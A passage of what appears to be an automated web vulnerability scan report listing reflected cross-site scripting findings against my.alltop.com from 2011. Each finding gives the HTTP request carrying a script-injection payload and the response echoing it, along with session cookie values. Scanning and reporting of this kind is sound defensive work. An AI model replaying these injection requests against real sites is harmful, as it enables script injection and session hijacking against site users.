Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:16 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3Cdf22f"><script>alert(1)</script>9bc35107a2a/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.79. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c66d"><script>alert(1)</script>df446e4c4a6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E7c66d"><script>alert(1)</script>df446e4c4a6 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:18 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:18 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:18 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E7c66d"><script>alert(1)</script>df446e4c4a6" method="post" accept-charset="utf-8">
...[SNIP]...

1.80. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44494"><script>alert(1)</script>ac9d9ed721a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E?44494"><script>alert(1)</script>ac9d9ed721a=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:08 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:08 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:08 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E?44494"><script>alert(1)</script>ac9d9ed721a=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.81. http://my.alltop.com/alpha/d/%22ns=%22netsparker(0x000178) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d/%22ns=%22netsparker(0x000178)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7af6"><script>alert(1)</script>827dcf1ba87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/de7af6"><script>alert(1)</script>827dcf1ba87/%22ns=%22netsparker(0x000178) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:21 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:22 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:22 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/de7af6"><script>alert(1)</script>827dcf1ba87/%22ns=%22netsparker(0x000178)" method="post" accept-charset="utf-8">
...[SNIP]...

1.82. http://my.alltop.com/alpha/d/%22ns=%22netsparker(0x000178) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d/%22ns=%22netsparker(0x000178)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f16cd"><script>alert(1)</script>930f3447f98 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d/%22nsf16cd"><script>alert(1)</script>930f3447f98=%22netsparker(0x000178) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:23 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d/%22nsf16cd"><script>alert(1)</script>930f3447f98=%22netsparker(0x000178)" method="post" accept-charset="utf-8">
...[SNIP]...

1.83. http://my.alltop.com/alpha/d/%22ns=%22netsparker(0x000178) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d/%22ns=%22netsparker(0x000178)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 731c2"><script>alert(1)</script>e0d03fcbfd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d/%22ns=%22netsparker(0x000178)?731c2"><script>alert(1)</script>e0d03fcbfd1=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:16 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d/%22ns=%22netsparker(0x000178)?731c2"><script>alert(1)</script>e0d03fcbfd1=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.84. http://my.alltop.com/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19541"><script>alert(1)</script>a0ee1d2bd98 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d19541"><script>alert(1)</script>a0ee1d2bd98/%2522ns%253D%2522netsparker%25280x00017B%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d19541"><script>alert(1)</script>a0ee1d2bd98/%2522ns%253D%2522netsparker%25280x00017B%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.85. http://my.alltop.com/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a30b"><script>alert(1)</script>80c3e08212b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529)6a30b"><script>alert(1)</script>80c3e08212b HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529)6a30b"><script>alert(1)</script>80c3e08212b" method="post" accept-charset="utf-8">
...[SNIP]...

1.86. http://my.alltop.com/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ed1c"><script>alert(1)</script>8a0b1056dd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529)?4ed1c"><script>alert(1)</script>8a0b1056dd5=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

